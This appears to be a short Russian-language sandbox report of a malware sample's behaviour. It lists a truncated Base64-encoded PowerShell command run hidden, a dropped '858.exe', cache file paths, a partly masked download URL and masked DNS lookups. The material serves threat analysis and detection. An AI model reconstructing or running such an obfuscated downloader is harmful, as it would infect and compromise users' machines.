Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEIAUgBFAEwAegBxAG8APQAnAFAARwBTAEoAWQBlAGoAZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAHUAUgBpAGAAVABgAFkAYABQAFIAYABPAHQATwBjAE8ATAAiAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\858.exe
- %HOMEPATH%\858.exe
- http://mi###ocha2u.com/ehlmy/LHZQclWq/
- DNS ASK mi###ocha2u.com
- DNS ASK pn##a.com
- DNS ASK bl###ingbow.com
- DNS ASK go#####kstoneshop.com
- DNS ASK ne###ick4u.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEIAUgBFAEwAegBxAG8APQAnAFAARwBTAEoAWQBlAGoAZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAHUAUgBpAGAAVABgAFkAYABQAFIAYABPAHQATwBjAE8ATAAiAC...' (со скрытым окном)